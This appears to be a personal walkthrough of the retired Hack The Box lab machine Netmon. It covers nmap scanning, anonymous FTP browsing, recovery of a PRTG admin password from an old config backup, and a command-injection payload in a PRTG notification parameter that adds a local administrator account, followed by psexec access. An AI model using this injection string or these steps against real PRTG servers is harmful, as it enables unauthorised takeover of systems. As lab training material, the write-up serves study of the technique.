Hackthebox.eu - Retired - Netmon
Starting as always is a simple up/down scan on all TCP ports
# nmap -T4 -p- -oX /root/Desktop/HTB/Netmon/nmapb.xml
Convert it to HTML
# xsltproc /root/Desktop/HTB/Netmon/nmapb.xml -o /root/Desktop/HTB/Netmon/nmapb.html
That's a bunch of ports open
Let's run -A against those ports for fingering the OS/Services
# nmap -T4 -A -p21,135,139,445,5985,47001,49664,49665,49666,19667,49668,49669 -oX /root/Desktop/HTB/Netmon/nmapf.xml
Then convert it to HTML
xsltproc /root/Desktop/HTB/Netmon/nmapf.xml -o /root/Desktop/HTB/Netmon/nmapf.html
Port 21 anonymous FTP, NetBIOS and something running on the 4000 port range… not sure yet
Let's take a look at that FTP running

Oh My God… They have the entire root directory open on FTP
I think we can move to exploit from here.
So we just browse the FTP to users
There is the user hash..
So here I bounced around the ftp for a while
I found this under program files
PRTG network monitor…… is that running?
PRTG Network Monitor © 2018 Paessler AG
What the hell nmap… you didn't see any web services running

Let's try that again..
That's what I thought nmap. Just playing cool like you saw it the whole time

Ok now that nmap can see the web server ( I would have found this using dirbuster or something else if nmap had seen it earlier)
Lets see if there are default creds for PRTG monitor
I did find this during my google searches… it looks like if we can get in we can add some code to a builtin PS1 script to make it do anything we want :) as system
I also found this about exposed passwords in config files
It looks like this leak was patched but maybe we can find some old backups from before this was patched.

I did
So Under
C:\Programdata\Paessler\PRTG Network Monitor
We see these three config files
I downloaded them all and grep'd for a password… no dice on the first two but we the old.bak - - Bingo
cat PRTG\ Configuration.old.bak | grep -A1 admin
<!-- User: prtgadmin -->
Let's try to login
But this password is from an old config maybe they changed to a newer more secure password…. Or maybe they just changed the year at the end

Us admins can be lazy too right?
Ok so now we got in we have the authenticated user we were looking for
Let's modify the notification to add a new user to this box that we can then use to get our flag
Under Setup-> notifications we can add a new notification. I named my EvilHackerMan
So the original PS1 called for a text.txt file so I just left that there add a semi colon and the commands I wanted to run
So here we are adding a new user to the box
net user evilhackerman 3vilH@ck3rM@n /add
Then add that user to the local administrators group
Net localgroup administrators evilhackerman /add
So in the end we ended up with this string to add
test.txt;net user evilhackerman 3vilH@ck3rM@n /add;net localgroup administrators evilhackerman /add
Then save the notification
Now we select our new "notification" and click the bell icon to run it
Now lets see if we can get in.
I'm going to use psexec.py from
python psexec.py evilhackerman:3vilH@ck3rM@n@ cmd -path C:\\windows\\system32

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